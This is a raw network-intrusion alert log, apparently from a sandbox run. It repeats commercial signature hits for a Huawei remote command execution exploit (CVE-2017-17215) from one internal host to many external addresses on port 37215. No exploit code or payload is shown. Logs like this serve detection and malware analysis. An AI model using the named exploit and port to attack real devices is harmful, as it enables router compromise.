                                                        06/13/24-21:31:57.093284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737037215192.168.2.14156.64.30.138
                                                        06/13/24-21:32:17.702518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497837215192.168.2.1441.14.108.70
                                                        06/13/24-21:32:32.153291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3692637215192.168.2.14156.13.42.148
                                                        06/13/24-21:33:00.870478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3458237215192.168.2.14197.166.37.172
                                                        06/13/24-21:32:11.509189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4199037215192.168.2.14197.200.236.206
                                                        06/13/24-21:32:01.246734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511837215192.168.2.1441.116.95.160
                                                        06/13/24-21:32:01.219077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3329037215192.168.2.1441.153.23.133
                                                        06/13/24-21:32:25.970476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4004437215192.168.2.14156.242.238.189
                                                        06/13/24-21:32:42.407647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3647437215192.168.2.1441.72.80.46
                                                        06/13/24-21:32:38.320461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4048037215192.168.2.1441.4.176.241
                                                        06/13/24-21:33:07.055445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4540037215192.168.2.1441.50.26.26
                                                        06/13/24-21:32:11.507978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455237215192.168.2.1441.234.233.104
                                                        06/13/24-21:33:09.109838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4448037215192.168.2.14197.221.148.18
                                                        06/13/24-21:33:02.913772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077837215192.168.2.1441.48.52.6
                                                        06/13/24-21:32:38.318675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3653237215192.168.2.14156.70.174.176
                                                        06/13/24-21:32:36.262409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5820037215192.168.2.14156.58.43.158
                                                        06/13/24-21:32:38.320575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412637215192.168.2.14197.72.226.166
                                                        06/13/24-21:32:40.373011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4682237215192.168.2.14156.111.242.219
                                                        06/13/24-21:32:32.165990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5192237215192.168.2.14156.188.96.222
                                                        06/13/24-21:32:28.027495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4272037215192.168.2.14197.122.77.133
                                                        06/13/24-21:33:00.886773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4868437215192.168.2.14197.180.205.157
                                                        06/13/24-21:32:54.709713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349037215192.168.2.1441.214.246.84
                                                        06/13/24-21:32:15.604543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093837215192.168.2.14156.251.176.139
                                                        06/13/24-21:32:21.803959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643437215192.168.2.14197.198.9.104
                                                        06/13/24-21:33:02.912299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3637637215192.168.2.1441.218.24.147
                                                        06/13/24-21:32:58.844115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5855437215192.168.2.14197.224.22.77
                                                        06/13/24-21:32:13.565040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4121237215192.168.2.14197.190.156.78
                                                        06/13/24-21:33:00.888232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305237215192.168.2.1441.23.16.218
                                                        06/13/24-21:32:32.170623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3476237215192.168.2.14156.132.7.182
                                                        06/13/24-21:32:17.678296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3912237215192.168.2.1441.237.147.178
                                                        06/13/24-21:32:19.750757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709637215192.168.2.1441.95.255.23
                                                        06/13/24-21:33:15.252928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3390437215192.168.2.14197.140.146.160
                                                        06/13/24-21:33:07.039332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239237215192.168.2.1441.19.86.53
                                                        06/13/24-21:32:36.248502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5113037215192.168.2.1441.161.71.9
                                                        06/13/24-21:31:59.173811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600037215192.168.2.14156.119.120.12
                                                        06/13/24-21:33:17.309124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5211237215192.168.2.1441.225.209.141
                                                        06/13/24-21:32:52.658286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621437215192.168.2.14197.205.88.129
                                                        06/13/24-21:32:40.371870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4398437215192.168.2.14197.224.236.207
                                                        06/13/24-21:32:36.243548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4042037215192.168.2.14156.197.80.119
                                                        06/13/24-21:33:09.110394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775437215192.168.2.14197.140.90.27
                                                        06/13/24-21:32:46.523943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349437215192.168.2.1441.194.149.210
                                                        06/13/24-21:32:42.408907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505037215192.168.2.1441.246.179.114
                                                        06/13/24-21:32:44.457767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5935637215192.168.2.1441.7.21.234
                                                        06/13/24-21:33:09.087750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056437215192.168.2.14197.231.48.210
                                                        06/13/24-21:32:52.655582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3900037215192.168.2.14197.122.19.12
                                                        06/13/24-21:32:07.404491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291437215192.168.2.1441.62.184.101
                                                        06/13/24-21:32:07.400974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4381237215192.168.2.14197.8.31.57
                                                        06/13/24-21:32:03.306380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709837215192.168.2.14156.6.81.141
                                                        06/13/24-21:32:25.996911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966837215192.168.2.1441.77.121.20
                                                        06/13/24-21:32:44.475714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4783837215192.168.2.14197.50.90.165
                                                        06/13/24-21:33:13.213098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5330837215192.168.2.14156.121.193.226
                                                        06/13/24-21:32:58.841175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5513437215192.168.2.14156.144.31.156
                                                        06/13/24-21:32:28.025583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4060037215192.168.2.1441.66.251.209
                                                        06/13/24-21:32:07.416514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4168037215192.168.2.14156.101.98.90
                                                        06/13/24-21:32:28.044921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4378237215192.168.2.14197.97.142.130
                                                        06/13/24-21:32:48.569171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5956037215192.168.2.14156.231.102.126
                                                        06/13/24-21:32:07.416975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198837215192.168.2.14197.77.250.52
                                                        06/13/24-21:32:21.784439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6054037215192.168.2.1441.73.157.28
                                                        06/13/24-21:33:02.913653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4743237215192.168.2.14156.47.40.135
                                                        06/13/24-21:32:34.191939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5679637215192.168.2.14197.116.194.189
                                                        06/13/24-21:32:52.658816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4463837215192.168.2.1441.18.42.65
                                                        06/13/24-21:33:04.992823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3730637215192.168.2.14156.52.21.151
                                                        06/13/24-21:32:36.269001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5479437215192.168.2.1441.144.239.49
                                                        06/13/24-21:32:44.477743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4722237215192.168.2.1441.20.98.110
                                                        06/13/24-21:32:44.453198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5168637215192.168.2.14197.212.37.233
                                                        06/13/24-21:32:48.572000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928837215192.168.2.14156.16.231.157
                                                        06/13/24-21:33:15.254864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3868037215192.168.2.1441.178.202.21
                                                        06/13/24-21:32:48.549897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291637215192.168.2.14156.61.201.156
                                                        06/13/24-21:33:07.037930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439837215192.168.2.14156.192.211.222
                                                        06/13/24-21:32:36.247515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3715037215192.168.2.1441.165.75.144
                                                        06/13/24-21:32:34.214315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4692437215192.168.2.14197.39.66.195
                                                        06/13/24-21:33:09.107070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336637215192.168.2.14156.193.71.162
                                                        06/13/24-21:33:00.871241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026437215192.168.2.14156.182.204.98
                                                        06/13/24-21:32:03.279737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5520837215192.168.2.14156.134.246.13
                                                        06/13/24-21:32:13.570422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3779237215192.168.2.14156.173.123.3
                                                        06/13/24-21:32:32.150879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4458437215192.168.2.1441.213.185.69
                                                        06/13/24-21:31:57.131175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5962237215192.168.2.1441.201.218.232
                                                        06/13/24-21:32:32.165626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625437215192.168.2.1441.171.3.93
                                                        06/13/24-21:33:07.056344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485637215192.168.2.1441.231.114.62
                                                        06/13/24-21:33:17.310428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5845637215192.168.2.1441.205.232.40
                                                        06/13/24-21:31:59.176426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770037215192.168.2.14197.82.233.43
                                                        06/13/24-21:32:48.556226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4028637215192.168.2.14156.234.212.174
                                                        06/13/24-21:32:56.791547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4059037215192.168.2.1441.16.40.26
                                                        06/13/24-21:32:15.603585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4518237215192.168.2.14156.225.87.226
                                                        06/13/24-21:33:09.127523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4217837215192.168.2.1441.5.78.109
                                                        06/13/24-21:32:03.278149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5068437215192.168.2.14197.11.150.37
                                                        06/13/24-21:33:09.086875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845437215192.168.2.14197.199.1.56
                                                        06/13/24-21:32:50.613981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6009237215192.168.2.14156.172.61.209
                                                        06/13/24-21:32:32.164575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5553637215192.168.2.14156.177.236.23
                                                        06/13/24-21:32:32.169333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324237215192.168.2.14156.37.144.17
                                                        06/13/24-21:32:40.357379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5028437215192.168.2.1441.85.193.179
                                                        06/13/24-21:33:09.087928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5361037215192.168.2.1441.160.166.136
                                                        06/13/24-21:32:15.635878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4124037215192.168.2.14156.251.25.232
                                                        06/13/24-21:32:21.786256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414237215192.168.2.1441.124.62.186
                                                        06/13/24-21:32:40.355960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200637215192.168.2.14197.125.50.89
                                                        06/13/24-21:32:32.170805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5712637215192.168.2.14156.171.13.248
                                                        06/13/24-21:32:25.996831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5567837215192.168.2.1441.217.109.35
                                                        06/13/24-21:32:54.710174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5599237215192.168.2.14197.63.63.13
                                                        06/13/24-21:32:52.656947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4930037215192.168.2.14156.204.41.58
                                                        06/13/24-21:32:32.154207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5179637215192.168.2.14197.24.199.226
                                                        06/13/24-21:32:44.455288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3667837215192.168.2.14197.162.45.66
                                                        06/13/24-21:32:38.298047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4500237215192.168.2.14197.16.94.47
                                                        06/13/24-21:32:48.571656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3774637215192.168.2.1441.168.83.214
                                                        06/13/24-21:32:32.156257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4266637215192.168.2.1441.9.70.71
                                                        06/13/24-21:32:19.729942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3402637215192.168.2.1441.242.186.42
                                                        06/13/24-21:32:21.784220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4699637215192.168.2.14156.34.19.106
                                                        06/13/24-21:32:11.507269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4250637215192.168.2.1441.148.153.36
                                                        06/13/24-21:33:04.992609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5573437215192.168.2.1441.127.235.147
                                                        06/13/24-21:33:11.159211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5687037215192.168.2.14197.63.5.155
                                                        06/13/24-21:32:17.696947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4225037215192.168.2.14197.2.98.8
                                                        06/13/24-21:32:13.565829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5059037215192.168.2.14156.204.231.26
                                                        06/13/24-21:32:54.724545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817037215192.168.2.14156.66.170.98
                                                        06/13/24-21:32:30.100531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5717237215192.168.2.1441.222.245.128
                                                        06/13/24-21:32:34.214629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4191437215192.168.2.14197.227.42.33
                                                        06/13/24-21:32:44.451807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435237215192.168.2.14156.212.155.49
                                                        06/13/24-21:32:48.568305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4534037215192.168.2.14197.108.252.238
                                                        06/13/24-21:32:48.568397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4388237215192.168.2.14197.77.19.238
                                                        06/13/24-21:33:09.109270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5397037215192.168.2.14156.194.187.209
                                                        06/13/24-21:33:15.276570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863637215192.168.2.14197.142.249.157
                                                        06/13/24-21:32:21.780663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3898037215192.168.2.1441.38.128.253
                                                        06/13/24-21:33:11.155509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5487037215192.168.2.1441.61.150.220
                                                        06/13/24-21:32:07.417514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3612637215192.168.2.14156.176.211.237
                                                        06/13/24-21:32:07.403481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4192437215192.168.2.14156.161.104.61
                                                        06/13/24-21:33:15.259439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4418237215192.168.2.1441.162.194.248
                                                        06/13/24-21:33:11.172859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4322037215192.168.2.1441.105.49.88
                                                        06/13/24-21:33:17.307117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6076837215192.168.2.14156.239.255.249
                                                        06/13/24-21:32:05.377414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915237215192.168.2.14197.33.8.72
                                                        06/13/24-21:32:13.565908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158437215192.168.2.14197.129.93.39
                                                        06/13/24-21:32:21.805827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158237215192.168.2.14156.130.103.141
                                                        06/13/24-21:32:46.503962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4388237215192.168.2.14197.132.253.232
                                                        06/13/24-21:32:42.424210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3694237215192.168.2.14197.97.74.14
                                                        06/13/24-21:33:05.016590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3583037215192.168.2.14197.78.180.231
                                                        06/13/24-21:33:15.276820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200037215192.168.2.14156.153.96.81
                                                        06/13/24-21:32:07.416554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4820837215192.168.2.14197.249.128.217
                                                        06/13/24-21:32:54.725865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412437215192.168.2.14197.79.105.188
                                                        06/13/24-21:31:59.200246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3987037215192.168.2.1441.17.85.190
                                                        06/13/24-21:32:01.224689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862237215192.168.2.14156.229.51.209
                                                        06/13/24-21:33:02.954228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4142437215192.168.2.14197.36.54.14
                                                        06/13/24-21:32:54.711923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412437215192.168.2.14156.159.233.39
                                                        06/13/24-21:32:09.456095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4499437215192.168.2.1441.231.130.130
                                                        06/13/24-21:31:57.153391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5373637215192.168.2.1441.139.192.174
                                                        06/13/24-21:32:54.707374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3884037215192.168.2.14197.41.25.108
                                                        06/13/24-21:32:01.222794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4486637215192.168.2.1441.230.52.172
                                                        06/13/24-21:32:11.505564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4255637215192.168.2.14197.67.45.195
                                                        06/13/24-21:32:48.572116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087637215192.168.2.1441.175.85.24
                                                        06/13/24-21:32:56.758425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077637215192.168.2.1441.42.50.40
                                                        06/13/24-21:32:54.711900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515637215192.168.2.14197.199.193.210
                                                        06/13/24-21:32:52.678074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244637215192.168.2.14197.164.144.42
                                                        06/13/24-21:32:44.456736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5279637215192.168.2.14156.113.6.135
                                                        06/13/24-21:32:07.418094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183237215192.168.2.14156.63.148.78
                                                        06/13/24-21:32:25.978121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4730237215192.168.2.1441.103.227.73
                                                        06/13/24-21:33:09.109748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3441837215192.168.2.14197.111.142.188
                                                        06/13/24-21:32:25.976307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4943237215192.168.2.14197.84.102.163
                                                        06/13/24-21:32:28.045343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4460037215192.168.2.14156.20.37.112
                                                        06/13/24-21:32:56.757151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4083837215192.168.2.1441.171.124.212
                                                        06/13/24-21:33:04.991463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3781437215192.168.2.1441.148.79.197
                                                        06/13/24-21:32:52.658647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3805437215192.168.2.14197.78.114.151
                                                        06/13/24-21:33:11.160861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037437215192.168.2.1441.98.83.160
                                                        06/13/24-21:32:50.611605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4882237215192.168.2.1441.118.15.173
                                                        06/13/24-21:32:58.823811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4247037215192.168.2.14197.51.120.133
                                                        06/13/24-21:32:23.930929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3354837215192.168.2.14156.5.51.49
                                                        06/13/24-21:33:02.953747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470837215192.168.2.1441.114.55.140
                                                        06/13/24-21:32:36.246931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4701237215192.168.2.14197.40.109.95
                                                        06/13/24-21:32:44.453592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869237215192.168.2.14197.60.105.73
                                                        06/13/24-21:32:01.248788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4400037215192.168.2.14156.152.121.102
                                                        06/13/24-21:32:38.320154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5460237215192.168.2.14197.142.224.72
                                                        06/13/24-21:33:02.914813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946237215192.168.2.14197.79.206.66
                                                        06/13/24-21:33:09.130149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731237215192.168.2.14197.212.178.143
                                                        06/13/24-21:33:05.014150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5546637215192.168.2.14156.240.61.24
                                                        06/13/24-21:32:15.610531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4987837215192.168.2.14156.235.37.200
                                                        06/13/24-21:32:28.044467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4885437215192.168.2.14197.66.205.104
                                                        06/13/24-21:32:32.170676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5087637215192.168.2.14197.27.171.28
                                                        06/13/24-21:33:13.228040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4497637215192.168.2.1441.173.50.22
                                                        06/13/24-21:32:48.550267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761837215192.168.2.14156.141.186.64
                                                        06/13/24-21:33:09.128093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947637215192.168.2.1441.89.22.29
                                                        06/13/24-21:33:11.155295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4671037215192.168.2.14156.27.178.50
                                                        06/13/24-21:32:09.455634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825637215192.168.2.1441.203.212.59
                                                        06/13/24-21:33:00.872742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4555637215192.168.2.14197.40.90.248
                                                        06/13/24-21:33:02.913733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5211237215192.168.2.1441.242.113.202
                                                        06/13/24-21:33:07.039990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3477837215192.168.2.1441.240.71.82
                                                        06/13/24-21:32:03.276871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5245837215192.168.2.14156.150.6.110
                                                        06/13/24-21:32:11.510087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4418037215192.168.2.14156.164.232.52
                                                        06/13/24-21:33:09.129082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486837215192.168.2.14197.241.203.46
                                                        06/13/24-21:32:01.237950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3882437215192.168.2.14197.175.146.61
                                                        06/13/24-21:32:21.780972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4140837215192.168.2.1441.49.13.227
                                                        06/13/24-21:32:01.224805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3519837215192.168.2.14197.196.30.151
